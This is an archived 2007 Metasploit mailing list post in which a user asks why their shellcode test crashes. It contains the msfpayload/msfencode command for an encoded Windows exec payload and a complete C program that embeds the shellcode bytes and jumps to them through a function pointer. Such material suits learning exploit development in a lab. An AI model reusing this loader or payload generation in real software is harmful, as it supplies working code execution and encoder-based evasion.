Metasploit mailing list archives
Using encoded payload in executable
From: c0r31mp4ct at gmail.com (C0r3 1mp4ct)
Date: Thu, 7 Jun 2007 10:43:17 +0200
Hi List! I tried to use the output of "./msfpayload -e windows/x86/exec CMD=cmd EXITFUNC=process R | ./msfencode -e x86/avoid_utf8_tolower c" in a C program that executes it by simply transferring the control to the string buffer containing the encoded payload. The payload is generated on Fedora Core 6. Execution environment: OS: XP Professional SP2 fully patched and DEP turned off Compiler: LCC win32 The result is: "Access violation when reading [2F38247F]" Could someone help me? What i am doing wrong? Here is the program i compiled and tried to run: #include <stdio.h> #include <string.h> unsigned char buf[] = "\x6a\x1e\x6b\x3c\x24\x0b\x60\x03\x0c\x24\x6a\x11\x03\x0c\x24" "\x6a\x04\x68\x25\x7d\x30\x6d\x5f\x29\x39\x03\x0c\x24\x68\x61" "\x6e\x7c\x28\x5f\x29\x39\x03\x0c\x24\x68\x34\x12\x20\x04\x5f" "\x01\x39\x03\x0c\x24\x68\x02\x34\x6c\x7a\x5f\x29\x39\x03\x0c" "\x24\x68\x27\x04\x78\x5b\x5f\x01\x39\x03\x0c\x24\x68\x02\x0f" "\x72\x30\x5f\x29\x39\x03\x0c\x24\x68\x7f\x33\x7d\x29\x5f\x29" "\x39\x03\x0c\x24\x68\x78\x1b\x65\x60\x5f\x01\x39\x03\x0c\x24" "\x68\x7d\x12\x5e\x67\x5f\x01\x39\x03\x0c\x24\x68\x06\x63\x60" "\x02\x5f\x01\x39\x03\x0c\x24\x68\x0f\x5e\x3e\x12\x5f\x29\x39" "\x03\x0c\x24\x68\x03\x33\x18\x01\x5f\x01\x39\x03\x0c\x24\x68" "\x67\x73\x1e\x5e\x5f\x01\x39\x03\x0c\x24\x68\x17\x2c\x16\x16" "\x5f\x29\x39\x03\x0c\x24\x68\x66\x05\x1c\x16\x5f\x01\x39\x03" "\x0c\x24\x68\x11\x13\x23\x2a\x5f\x29\x39\x03\x0c\x24\x68\x7f" "\x3f\x78\x37\x5f\x29\x39\x03\x0c\x24\x68\x7e\x17\x31\x1e\x5f" "\x01\x39\x03\x0c\x24\x68\x02\x63\x04\x22\x5f\x01\x39\x03\x0c" "\x24\x68\x7f\x24\x38\x2f\x5f\x01\x39\x03\x0c\x24\x68\x2f\x35" "\x07\x6b\x5f\x01\x39\x03\x0c\x24\x68\x0f\x08\x1f\x67\x5f\x01" "\x39\x03\x0c\x24\x68\x1a\x31\x6d\x28\x5f\x01\x39\x03\x0c\x24" "\x68\x03\x2a\x7e\x1c\x5f\x01\x39\x03\x0c\x24\x68\x5d\x5c\x10" "\x2c\x5f\x01\x39\x03\x0c\x24\x68\x75\x61\x76\x63\x5f\x01\x39" "\x03\x0c\x24\x68\x2c\x77\x7f\x18\x5f\x01\x39\x03\x0c\x24\x68" "\x0d\x19\x0d\x21\x5f\x29\x39\x03\x0c\x24\x68\x19\x07\x04\x20" "\x5f\x29\x39\x03\x0c\x24\x68\x2d\x6d\x18\x30\x5f\x29\x39\x03" "\x0c\x24\x21\x66\x75\x6d\x61\x6e\x07\x6e\x08\x79\x5c\x01\x7a" "\x35\x5b\x06\x28\x14\x13\x04\x22\x10\x5d\x7a\x0a\x68\x08\x2b" "\x76\x16\x5b\x39\x2f\x72\x62\x0d\x01\x5e\x6a\x0b\x10\x20\x2a" "\x07\x38\x21\x0c\x03\x0e\x72\x6d\x01\x3b\x2d\x01\x7d\x25\x07" "\x2f\x75\x70\x2f\x24\x15\x0a\x5c\x03\x39\x6d\x72\x2b\x06\x02" "\x60\x5b\x0f\x77\x3c\x1e\x35\x5c\x11\x29\x20\x31\x04\x6c\x09" "\x02\x7c\x1e\x40\x05\x5f\x7a\x67\x63\x0e\x40\x3c\x09\x77\x6c" "\x10\x3c\x21\x7f\x72\x1b\x70\x0c\x09\x7c\x74\x68\x20\x37\x6d" "\x18\x30"; int main ( int argc, char * argv[] ){ void (* function)(); *(long *)&function = (long)&buf; function(); } Any help would be appreciated! Thanks! Regards: c0r31mp4ct
Current thread:
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)
- Using encoded payload in executable C0r3 1mp4ct (Jun 11)
- Using encoded payload in executable C0r3 1mp4ct (Jun 07)
- Using encoded payload in executable mmiller at hick.org (Jun 07)